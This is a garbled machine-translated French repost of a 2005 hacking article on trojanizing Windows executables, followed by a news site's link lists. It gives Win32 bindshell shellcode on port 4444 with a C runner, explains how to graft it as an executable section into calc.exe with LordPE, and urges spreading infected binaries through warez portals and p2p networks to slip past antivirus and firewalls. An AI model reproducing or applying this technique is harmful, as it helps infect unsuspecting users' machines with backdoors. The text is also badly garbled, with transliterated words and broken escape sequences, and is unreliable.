La façon idéale de se propager du code malveillant

Le moyen idéal pour propager du code "malveillant"
Auteur: Proteus [[email protected]]

Ce que vous devez:
1. LordPE par Yoda
2. W32Dasm
3. peid
4. TOPO
5. Eh bien, estessno nekrivye Rica;)

entrée

4to dirait qu'il n'y a pas, mais le Borg ne siègent pas autour ...
Il est révolu le plus "délicieux" trous, qui il y a quelques mois, il ne faisait pas partie des machines non protégées tysya4u Ruta. Maintenant, et injecter son code dans l'espace adressnoe "confiance" le processus ne surprendra personne. Même les feux d'artifice stupides nau4iis à traiter avec elle. Maintenant, trouver des moyens pour sophistiqués les uns les autres, mais si longtemps ne restent pas sans un «vaccin». Je suggère dans l'article décrit une méthode simple pour distribuer le «mal» (sous le "mal" Je ne veux pas nécessairement trojans, rootkits, etc., il peut être caché et visites de s4et4ik banales à votre logiciel de ska4ki des ressources, certaines statistiques , en général, tous les 4Pour parfois utile) Code par son introduction préliminaire au produit binaire "nécessaire" de sacrifice.

Faites le point

"Le canard leurre" de Sna4ala pour la victime - un fichier qui devrait soi-disant ska4at et courir à la victime. Ici, je vous ai, mon 4itatel curieux, une totale liberté de choix! Kone4no, DLLki melkosofta avec un certificat - choix de ne pas lu4shy, mais certains shareware sur un produit abstrait d'approches communes peut être très utile. Nous ne nous contentons pas être méchants, prenons calc.exe oby4ny du% Systemroot% (4to ou toute autre chose) et formerons sur elle ...

Préparation du code "mal"

Pour 4toby 4to quelque chose infect, ajouter un peu de code caché, vous devez préparer avant. Ici, nous allons faire sey4as. J'ai décidé de rester à la bindshelle banale - bien qu'il soit possible de faire et de télécharger un fichier à partir du réseau, en changeant \ supprimer les règles de feux d'artifice - et lui a préparé shellcode:

// Bindshell win32 sur le port 4444
#include
shellcode char [] = "\ x31"
"\ XC9 \ x83 \ XE9 \ xaf \ XD9 \ xee \ XD9 \ x74 \ x24 \ XF4 \ X5b \ x81 \ x73 \ x13 \ x92"
"\ X35 \ x88 \ x95 \ x83 \ XEB \ xfc \ xe2 \ XF4 \ x6e \ x5f \ x63 \ xda \ X7A \ xcc \ x77 \ X6a"
"\ X6D \ x55 \ x03 \ XF9 \ XB6 \ x11 \ x03 \ xd0 \ XAE \ xbe \ XF4 \ x90 \ xea \ x34 \ x67 \ x1e"
"\ Xdd \ X2D \ x03 \ xca \ XB2 \ x34 \ x63 \ x76 \ XA2 \ x7c \ x03 \ xa1 \ x19 \ x34 \ x66 \ XA4"
"\ X52 \ xac \ x24 \ x11 \ x52 \ x41 \ X8F \ x54 \ x58 \ x38 \ x89 \ x57 \ x79 \ xc1 \ xB3 \ xc1"
"\ XB6 \ X1D \ xfd \ x76 \ x19 \ X6a \ xac \ x94 \ x79 \ x53 \ x03 \ x99 \ XD9 \ xbe \ XD7 \ x89"
"\ X93 \ xde \ X8B \ XB9 \ x19 \ XBC \ XE4 \ xB1 \ X8E \ x54 \ X4b \ XA4 \ x52 \ x51 \ x03 \ XD5"
"\ Xa2 \ xbe \ XC8 \ x99 \ x19 \ x45 \ x94 \ x38 \ x19 \ x75 \ x80 \ xcb \ xfa \ xbb \ XC6 \ X9b"
"\ X7E \ x65 \ x77 \ x43 \ XA3 \ xee \ xee \ XC6 \ XF4 \ X5D \ xbb \ xa7 \ xfa \ x42 \ xfb \ xa7"
"\ Xcd \ x61 \ x77 \ x45 \ xfa \ xfe \ x65 \ x69 \ xA9 \ x65 \ x77 \ x43 \ xcd \ XBC \ X6D \ XF3"
"\ X13 \ xd8 \ x80 \ x97 \ XC7 \ x5f \ X8a \ X6a \ x42 \ X5D \ x51 \ x9c \ x67 \ x98 \ xdf \ X6a"
"\ X44 \ x66 \ xdb \ XC6 \ xc1 \ x66 \ xcb \ XC6 \ xd1 \ x66 \ x77 \ x45 \ XF4 \ X5D \ x99 \ XC9"
"\ XF4 \ x66 \ x01 \ x74 \ x07 \ X5D \ X2C \ X8F \ xe2 \ xf2 \ xdf \ X6a \ x44 \ x5f \ x98 \ XC4"
"\ XC7 \ xca \ x58 \ xfd \ x36 \ x98 \ XA6 \ x7c \ XC5 \ xca \ x5e \ XC6 \ XC7 \ xca \ x58 \ xfd"
"\ X77 \ x7c \ X0E \ xdc \ XC5 \ xca \ x5e \ XC5 \ XC6 \ x61 \ xdd \ X6a \ x42 \ XA6 \ xE0 \ x72"
"\ XEB \ XF3 \ xf1 \ xc2 \ X6D \ xe3 \ xdd \ X6a \ x42 \ x53 \ xe2 \ xf1 \ XF4 \ X5D \ XEB \ XF8"
"\ X1b \ xd0 \ xe2 \ XC5 \ xcb \ x1c \ x44 \ x1c \ x75 \ x5f \ xcc \ x1c \ x70 \ x04 \ x48 \ x66"
"\ X38 \ xcb \ xca \ XB8 \ x6c \ x77 \ XA4 \ x06 \ x1f \ X4F \ XB0 \ X3e \ x39 \ X9E \ xE0 \ XE7"
"\ X6c \ x86 \ X9E \ X6a \ XE7 \ x71 \ x77 \ x43 \ XC9 \ x62 \ xda \ XC4 \ xc3 \ x64 \ xe2 \ x94"
"\ Xc3 \ x64 \ xdd \ XC4 \ X6D \ xe5 \ xE0 \ x38 \ X4b \ x30 \ x46 \ XC6 \ X6D \ xe3 \ xe2 \ X6a"
"\ X6D \ x02 \ x77 \ x45 \ x19 \ x62 \ x74 \ x16 \ x56 \ x51 \ x77 \ x43 \ xc0 \ xca \ x58 \ xfd"
"\ X62 \ XBF \ X8c \ xca \ xc1 \ xca \ x5e \ X6a \ x42 \ x35 \ x88 \ x95";

int
main () {
void (* funct) ();
(Long) fonct = & shellcode;
fonct ();}

Maintenant compiler un programme qui effectue le shellcode et utiliser l'utilitaire sauve LordPE contenant sa section de données (portbind).

Convertir le shellcode dans la section de données

Prakti4eskaya 4ast

Puis charger le fichier dans LordPE «victime» et le télécharger portbind section de données supplémentaires (ne pas oublier de changer son drapeau sur E0000020, le code ina4e ne peut pas être exécuté!) Et rappelez-vous son décalage (elle est égale à D7000 dans mon dossier)

Loaded un fichier contenant section shellcode
Maintenant, il ne reste plus qu'à trouver un vide dans le programme de la victime (ou jamais réalisée à des vérifications) et introduire à la place zagruz4ik notre shellcode. Je l'ai fait comme ceci:

Je mis en œuvre zagruz4ik shellcode
Je pense que tout est clair, le code est exécuté au D7000. Et là, comme nous le rappelons, contient shellcode.

lancement uda4ny du code «mal» (shellcode utilisé par l'autre)
Après son lancement, le programme revient à l'exécution de "leur" corps ...

propagation

Basé sur le principe de «l'infection de code malveillant," avtomati4eski disparaître les problèmes de lutte contre les antivirus, pare-feu. Et pas étonnant, puisque l'utilisateur pensera 4to effectue toutes les actions pas notre application shellcode et la confiance déployée par lui et lui permettra à toute activité. D'accord, parce que pour arriver à notre "mal" dans le code binaire ne peut pas chaque odino4ku utilisateur. Et si vous utilisez tout type de conditionneurs, notre code serait à jamais un mystère!
Le seul problème est, la méthode d'infection ograni4ennost code "malveillant". Je vois le moyen le plus sûr de sa distribution de masse dans les portails de warez, un p2p, ou tout simplement enfin dans les réseaux urbains.

gl hf 2 tous
04.06.2005

Vous aimez? Abonnez - vous à RSS nouvelles!
Vous pouvez également soutenir shram.kiev.ua, cliquez sur:

Ne soyez pas mal à vos amis et trouver cette information, partager avec eux l'article!

Développer / Réduire

Commentaires

Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.

Gratuit Carte de crédit avec une limite de 15.000 USD.

Toutes les Nouvelles

101 Comment utiliser parachute cordon photo 05/03/2017
Tout ce que vous vouliez savoir sur les pneus. types de marquage, la saisonnalité photo 05/03/2017
Comment choisir des épices et des herbes naturelles de haute qualité photo 04/03/2017
Emma Watson (26) Section pour la Foire Mars de Vanity photo 03/04/2017
Emma Watson (Emma Watson) déshabillée pour un livre de beauté du naturel photo 03/04/2017
Tatouage avec l'image des héros célèbres photo 03/03/2017
Conduire tous les transports urbains à Kiev photo 28/02/2017
Combien de fois faut - il avoir des relations sexuelles selon l'âge photo 28/02/2017
Calendrier Pêche et prévisions de poisson Paix / poissons prédateurs pour 2017. photo 26/02/2017
Pêche noeuds comment attacher un crochet, se préparant à voler photo 26/02/2017
Euthanasie Coaster, un projet de montagnes russes destinés à la peine de mort photo 26/02/2017
page WEB peut être une preuve en cour photo 26/02/2017
Dans ce cosplay vous voulez jouer vous - même photo 25/02/2017
collection élégante de filles en provenance du Japon. photo 25/02/2017
Collez GOI (de GOI - Institut optique Etat) photo 24/02/2017
Les choses inutiles qui devrait rapidement se débarrasser photo 24/02/2017
habitudes quotidiennes Bad, en raison de laquelle il est ballonnements photo 24/02/2017
moteurs d'avions de leviers de commande (ORE), on ne sait jamais ... La photo 24/02/2017
Modern Design Carte de visite photo 23/02/2017
Chats, artiste Vladimir Roumiantsev photo 23/02/2017
Faits intéressants au sujet du film Prometheus photo 23/02/2017
Comme indiqué sur la conférence de la NASA? photo 21/02/2017
SSL format de certificat, comment convertir un certificat en .pem, .cer, .crt, .der, pkcs ou .pfx photo 21/02/2017
Types de saignements et les premières règles relatives aux aides que vous devez savoir! photo 20/02/2017
Les premiers signes de diabète, vous ne devez pas ignorer! photo 20/02/2017
erreurs des ménages qui tuent la beauté de l'intérieur photo 20/02/2017
Serebro Groupe dans le magazine Maxim, Mars 2017 photo 20/02/2017
En fait 2-3 enfants de jour voir le monde immédiatement après la naissance photo 18/02/2017
chaussures complètes de guidage pour les hommes photo 18/02/2017
Hijab, tchador, burqa - quelle est la différence? photo 18/02/2017
yoga efficace pose pour une belle et résilient poitrine photo 15/02/2017

101 Parachute cordon de dosage Pour la plupart des gens parachute familiers cordon comme un outil très pratique pour ... Photo 05/03/2017
Tout ce que vous vouliez savoir sur les pneus. types de marquage, saisonniers pneus sont le principal lien entre la voiture et la route. De ... Photo 05/03/2017
Comment choisir les épices et les assaisonnements naturels de haute qualité Comment choisir les épices naturelles et d' herbes dans le marché ou dans le ... Photo 04/03/2017
Emma Watson (26 ans) déshabillée pour Vanity Fair Mars Emma déshabillée pour le magazine Vanity Fair en Mars, cependant, sur la couverture ... Photo 04/03/2017
Emma Watson (Emma Watson) déshabillée pour le livre Natural Beauty Emma a décidé de le faire pour le livre Natural Beauty! Et elle ... Photo 04/03/2017
Tatouage avec l'image des héros célèbres Bitansky artiste de tatouage crée des tatouages incroyablement réalistes avec des images de héros célèbres ... Photo 03/03/2017
Conduire tous Kiev transports urbains Scheme marqué tous les itinéraires de bus, trolleybus et de tramway, et ... Photo 28/02/2017
Combien de fois faut avoir des relations sexuelles selon l'âge Beaucoup de gens sont curieux de savoir, des relations sexuelles, ils sont trop nombreux ou trop ... Photo 28/02/2017
Calendrier Pêche et prévisions de poisson Paix / poissons prédateurs en 2017 Il y a certaines phases de la lumière lorsque vous avez juste besoin d'être seul ... Photo 26/02/2017
nœuds de pêche Comment attacher un crochet, se préparant à voler Type de noeud sélectionné en fonction du type de ligne de pêche (monofilament ou ... Photo 26/02/2017
Euthanasie Coaster, un projet de montagnes russes destinés à la peine de mort L'auteur reconnaît que les montagnes russes ne sont pas la machine optimale pour ... Photo 26/02/2017
page WEB peut être une preuve en justice doit être entendu que, par exemple, le droit d' auteur ne viole pas en soi ... Photo 26/02/2017 existante
Dans ce cosplay, vous aurez envie de jouer des jeux de base des prototypes costume - personnages de dessin animé, anime, jeux vidéo, films, ... Photo 25/02/2017
collection élégante de filles en provenance du Japon. Japonais (Jap nihondzin / nippondzin, Nihon minzoku.) - Le peuple, le principal (plus de 98%) ... Photo 25/02/2017
Collez GOI (de GOI - Institut optique Etat) pâte GOI peut être utilisé pour le polissage des produits de divers ... Photo 24/02/2017
Les choses inutiles qui devrait rapidement se débarrasser Lire la réflexion, dans lequel vous allez apprendre à lâcher prise de ... Photo 24/02/2017
Les mauvaises habitudes quotidiennes, en raison de laquelle il est ballonnements croit que ballonnements - il est pas une maladie distincte, mais ... Photo 24/02/2017
moteurs d'avions de leviers de commande (ORE), on ne sait jamais ... Levier de commande du moteur (RUD) - avions du corps de gestion du groupe motopropulseur ... Photo 2017-02-24
Modern Design Cartes de visite carte teurs (carte) - Information traditionnelle de contacts avec les médias sur une personne ... Photo 23/02/2017
Chats, artiste Vladimir Roumiantsev Vladimir Roumiantsev, né en 1957, a commencé à peindre à l'âge de ... Photo 23/02/2017
Faits intéressants au sujet du film Prometheus Qui sommes - nous vraiment? D' où vient et où ... Photo 23/02/2017

Chats. Peintre Vladimir Roumiantsev. photo 23/02/2017
"Prometheus" - Faits intéressants photo 23/02/2017
Vu cheerleaders lituaniennes? A voir! 23/02/2017
Olsen, Elizabeth / Elizabeth Olsen photo 23/02/2017
Elle était assise près de la fenêtre, et il est allé dans sa voiture ... La photo 23/02/2017
Chats photo, chats, chatons photo 23/02/2017
Comment peut fonctionner Tortue photo 23/02/2017
Bengal Cat Talking With Kitten 23/02/2017
La Banque Nationale a publié une nouvelle pièce (Photo) photo 23/02/2017
Il y a Protasov Yar 30 ans photo 23/02/2017
Photo Animaux photo 23/02/2017
Traduction NASA Ce qui est dit à la conférence de la NASA photo 23/02/2017
Quelque chose au sujet de la taille de Jupiter, Courses "Through" Sun photo 22/02/2017
rues centrales de Kiev va bloquer pendant cinq jours photo 20/02/2017
3 façons de rendre les gens Vagina goulot d' étranglement et la fermeté photo 20/02/2017
Monica Bellucci Gq Magazine en Italie, Février 2017 photo 20/02/2017
«Serebro» Groupe B Magazine Maxim, Mars 2017 photo 20/02/2017
Que faire si vous êtes détenu par la police - Article 146 Piraterie photo 20/02/2017
Il y a un nouveau libre OS photo 18/02/2017
Bois sous le microscope électronique photo 18/02/2017
Paiement par carte de marché en 2016 a montré une croissance significative photo 18/02/2017

social

Chargement en cours ...

Votre adresse IP: 66.249.93.29
Votre Pays: EU

Free 50 UAH for your Monobank card?